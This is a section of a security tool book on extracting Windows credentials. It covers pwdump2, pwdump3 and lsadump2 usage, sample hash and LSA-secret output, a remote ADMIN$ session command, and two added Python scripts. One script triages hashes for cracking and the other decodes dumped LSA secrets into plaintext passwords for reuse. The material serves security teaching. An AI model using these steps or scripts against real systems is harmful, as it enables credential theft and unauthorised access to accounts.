Grabbing Windows Password Hashes




After reviewing the L0phtCrack section of this chapter, you may have noticed that an administrator can get at Windows password hashes almost as easily as a Unix administrator can read the /etc/shadow file. The difference is that /etc/shadow is a plain-text file that can be opened in any editor or printed to the screen, while the Windows SAM database is a binary hive that does not lend itself to inspection. This is why we need tools such as pwdump or lsadump to produce a text version of its contents.

Pwdump

Pwdump2 (http://www.webspan.net/~tas/pwdump2/), by Todd Sabin, can be used to extract the hashed passwords from a Windows system. It is a command-line tool that must be run locally on the target system; we’ll take a look at pwdump3, which can operate remotely, later in this section.

Implementation

Pwdump2 is version 2 of a tool first written by Jeremy Allison of the Samba project. Unlike the original, pwdump2 is not stopped by SysKey encryption of the SAM database: rather than reading the SAM hive from disk, it injects a DLL into the LSASS process and obtains the hashes from LSA after it has decrypted them. SysKey was introduced with Windows NT 4.0 Service Pack 3 in an attempt to add a layer of protection to the SAM database, but its effectiveness against a local administrator is questionable, as pwdump2 demonstrates. The usage for pwdump2 is shown here:

C:\>pwdump2.exe /?
Pwdump2 - dump the SAM database.
Usage: pwdump2.exe <pid of lsass.exe>

It must be run with Administrator privileges to obtain the password hashes:

C:\>pwdump2.exe
Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46...
Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c...
skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee...

You do not usually have to supply the process ID (PID) of lsass.exe; pwdump2 locates it on its own. If you do need it, the Resource Kit tools tlist or pulist combined with the find command will show it (the /i option instructs find to ignore case):

C:\>tlist | find /i "lsass"
 244 LSASS.EXE

C:\>pulist | find /i "lsass"
LSASS.EXE         244  NT AUTHORITY\SYSTEM

C:\>pwdump2.exe 244
Administrator:500:f1e5c5efbc8cfb7f18136fb05f77a0bf:55c77b761ffa46...
Orc:501:cbc501a4d2227783cbc501a4d2227783:f523558e22c95c62a6d6d00c...
skycladgirl:1013:aa5536a42ebe131baad3b235b51404ee:db31a1ee00bfbee...

The one drawback of pwdump2's output is that L0phtCrack cannot read it as-is. The sole reason is that the hexadecimal digits in the hashes are lowercase, and L0phtCrack expects them in uppercase. John the Ripper, by contrast, accepts either case.

Fortunately, the tr (translate characters) utility sets this right for those who prefer the GUI cracker. tr is standard on Unix systems and in Cygwin, and a Windows port is included in the Resource Kit.

[user@hediwg ]$ cat pwdump.out | tr a-z A-Z
ADMINISTRATOR:500:F1E5C5EFBC8CFB7F18136FB05F77A0BF:55C77B761FFA46...
ORC:501:CBC501A4D2227783CBC501A4D2227783:F523558E22C95C62A6D6D00C...
SKYCLADGIRL:1013:AA5536A42EBE131BAAD3B235B51404EE:DB31A1EE00BFBEE...
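The tr one-liner above uppercases the whole line, user names included. The following Python script is an added example (not part of the book or of the pwdump tools) that does the same conversion on the hash fields only, and also triages the dump before cracking: it recognises the well-known hashes of the empty password, the NO PASSWORD marker that pwdump3 writes when no LM hash is stored, and LM hashes whose second half is the empty-half constant, which means the password is seven characters or fewer. The sample input is constructed for the example; none of its hashes are real.

```python
import re

# Well-known LM and NT hashes of the empty password (lowercase hex).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
# pwdump3 writes this in the LM field when no LM hash is stored for the account.
NO_LM_MARKER = "NO PASSWORD"
HEX32 = re.compile(r"^[0-9a-f]{32}$")

# Constructed sample in pwdump format (user:RID:LM hash:NT hash:::).
# These are not real hashes; the values were chosen to exercise each check.
SAMPLE = """\
Administrator:500:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
short:1001:0123456789abcdefaad3b435b51404ee:00112233445566778899aabbccddeeff:::
nolm:1002:NO PASSWORD*********************:00112233445566778899aabbccddeeff:::
blank:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""


def parse_pwdump(text):
    """Parse pwdump-style lines into dicts; hashes are lowercased for comparison."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) < 4 or not fields[1].isdigit():
            raise ValueError(f"line {lineno}: expected user:rid:lm:nt")
        user, rid, lm, nt = fields[0], int(fields[1]), fields[2], fields[3].lower()
        if lm.startswith(NO_LM_MARKER):
            pass                              # keep pwdump3's marker verbatim
        elif HEX32.match(lm.lower()):
            lm = lm.lower()
        else:
            raise ValueError(f"line {lineno}: bad LM hash {lm!r}")
        if not HEX32.match(nt):
            raise ValueError(f"line {lineno}: bad NT hash {nt!r}")
        records.append({"user": user, "rid": rid, "lm": lm, "nt": nt})
    return records


def triage(records):
    """Map each user to the flags that decide how to attack the account.

    LM hashes the two 7-character halves of the password independently, so if
    the second half of the hash equals the second half of EMPTY_LM, the password
    is 7 characters or fewer and only the first half needs cracking.
    """
    result = {}
    for r in records:
        flags = []
        lm, nt = r["lm"], r["nt"]
        if lm.startswith(NO_LM_MARKER):
            flags.append("lm_disabled")
        elif lm == EMPTY_LM:
            flags.append("empty_lm")
        else:
            flags.append("lm_crackable")
            if lm[16:] == EMPTY_LM[16:]:
                flags.append("password_le_7")
        if nt == EMPTY_NT:
            flags.append("empty_nt")
        result[r["user"]] = flags
    return result


def to_l0phtcrack(text):
    """Rewrite pwdump output with uppercase hashes, as L0phtCrack expects.

    Unlike `tr a-z A-Z`, this leaves the user names untouched.
    """
    lines = []
    for r in parse_pwdump(text):
        lines.append(f"{r['user']}:{r['rid']}:{r['lm'].upper()}:{r['nt'].upper()}:::")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    for user, flags in triage(parse_pwdump(SAMPLE)).items():
        print(f"{user:15} {' '.join(flags) or '-'}")
    print(to_l0phtcrack(SAMPLE))
```

Run it on a real pwdump.out by reading the file into `to_l0phtcrack` and writing the result out; the triage flags tell you which accounts have a crackable LM hash at all, which is what decides whether a fast LM attack or a slower NT-only attack is in order.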

Pwdump3

Pwdump3 (http://www.ebiz-tech.com/pwdump3/), by Phil Staubs, extended the tool once more by adding remote access to a target machine. A variant, pwdump3e, additionally encrypts the remote connection so that the hashes cannot be sniffed in transit. The usage differs slightly:

Usage: PWDUMP3 machineName [outputFile] [userName]

C:\>PwDump3.exe victim pwdump.out root
C:\>type pwdump.out
guest:1001:NO PASSWORD*********************:2DEAC3223C70B24E90F02...
wwwadmin:500:NO PASSWORD*********************:9CBD10B05F8E69B62F2...
IUSR_WWW01:1003:6E72211CDC51C9F8EB9293C3135F3985:0E2A2DCE3B6ABFBA...

For pwdump3 to work, you must be able to establish a session to the target's ADMIN$ share, because it copies its service component to the target over that share and starts it there. Pwdump3 will set up the session for you and prompt for the administrator password. Alternatively, you can establish the session to ADMIN$ by hand with the net command:

C:\>net use \\victim\admin$ * /u:Administrator
Type the password for \\victim\admin$:
The command completed successfully.

Lsadump2

Lsadump2 (http://razor.bindview.com/tools/desc/lsadump2_readme.html) makes password harvesting trivial in the right circumstances. Another tool by Todd Sabin, it is an update of an original written by Paul Ashton. The difference between lsadump2 and the pwdump tools is that lsadump2 dumps plain-text LSA secrets rather than password hashes, so there is nothing to crack. The catch is that lsadump2 retrieves a password only if the Local Security Authority (LSA) has it stored as a secret. That happens, for example, when a service or web application runs under a specific account, or when a backup utility logs in to the system remotely to archive files.

Implementation

Lsadump2 requires Administrator access to run. The usage for lsadump2 is shown here:

C:\>lsadump2.exe
Lsadump2 - dump an LSA secret.
Usage: lsadump2.exe <pid of lsass.exe> <secret>

You will have to determine the PID of lsass.exe (just as with pwdump2):

C:\>tlist | find /i "lsass"
 244 LSASS.EXE
Tip 

The PID for the LSA process is also stored in the registry under this key: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LsaPid.

The tool prints every LSA secret it can read, in plain text. A secret might be the password of a service account, phone number information for RAS, or the password a remote backup utility uses. Each secret is printed as its name followed by a hex dump in two columns:

aspnet_WP_PASSWORD
 61 00 77 00 41 00 39 00 65 00 68 00 68 00 61 00  a.w.A.9.e.h.h.a.
 4B 00 38 00                                      K.8.

The left column holds the raw bytes of the secret in hexadecimal; the right column is the printable ASCII rendering of the same bytes, with a dot for each non-printable byte. If you have recently installed the .NET Framework on your Windows 2000 system, you most likely have an ASPNET user, and lsadump2 has just revealed its password: awA9ehhaK8. Note that Windows stores strings as little-endian UTF-16, which is why a null byte (00) follows each ASCII character. Luckily, the default settings for this account do not permit it to log on remotely or execute commands interactively.
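Reading the password out of the hex dump by hand is fine for one secret but tedious for a machine with dozens. The following Python script is an added example (not part of the book or of lsadump2) that parses lsadump2-style output, concatenates the hex rows of each secret, and decodes the bytes as UTF-16LE, which is exactly why the null bytes appear in the dump. Secrets that are not clean text (binary blobs, or bytes that are not valid UTF-16) are returned as hex instead of being mangled. The sample input is constructed: the first secret is the one shown above, the second (_SC_MyBackupSvc, a hypothetical service-account secret; service passwords are stored under the _SC_<servicename> name) is invented for the example.

```python
# Constructed sample of lsadump2 output: a secret name flush-left on its own
# line, followed by its bytes as hex (16 per row) and an ASCII rendering.
# aspnet_WP_PASSWORD is the secret shown on the page; _SC_MyBackupSvc is a
# hypothetical service-account secret made up for this example.
SAMPLE = """\
aspnet_WP_PASSWORD
 61 00 77 00 41 00 39 00 65 00 68 00 68 00 61 00  a.w.A.9.e.h.h.a.
 4B 00 38 00                                      K.8.
_SC_MyBackupSvc
 50 00 40 00 73 00 73 00 31 00 32 00 33 00        P.@.s.s.1.2.3.
"""


def parse_lsadump2(text):
    """Return {secret_name: raw_bytes} from lsadump2-style output."""
    secrets = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():                 # secret names are flush-left
            current = line.strip()
            secrets[current] = b""
            continue
        if current is None:
            raise ValueError("hex row appears before any secret name")
        # The hex column is separated from the ASCII column by two spaces;
        # bytes.fromhex() ignores the single spaces between byte values.
        hex_col = line.strip().split("  ", 1)[0]
        secrets[current] += bytes.fromhex(hex_col)
    return secrets


def decode_secret(raw):
    """Render a secret as UTF-16LE text if it decodes cleanly, else as hex.

    Windows stores these strings as UTF-16LE, so every ASCII character in the
    dump is followed by a 00 byte. Odd-length data or invalid surrogates mean
    the secret is not a string, so it is shown as hex rather than garbage.
    """
    if len(raw) % 2 == 0:
        try:
            text = raw.decode("utf-16-le")
        except UnicodeDecodeError:
            text = None
        if text is not None and text.isprintable():
            return text
    return raw.hex()


def dump_secrets(text):
    """Map each secret name in lsadump2 output to its decoded value."""
    return {name: decode_secret(raw) for name, raw in parse_lsadump2(text).items()}


if __name__ == "__main__":
    for name, value in dump_secrets(SAMPLE).items():
        print(f"{name}: {value}")
```

Pipe saved lsadump2 output into `dump_secrets` and the service-account passwords come out as strings, ready to try against the accounts they belong to; anything that stays hex is a binary secret (a machine account key, for instance) rather than a typed password.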






Anti-Hacker Tool Kit, Third Edition
ISBN: 0072262877
Year: 2004
Pages: 189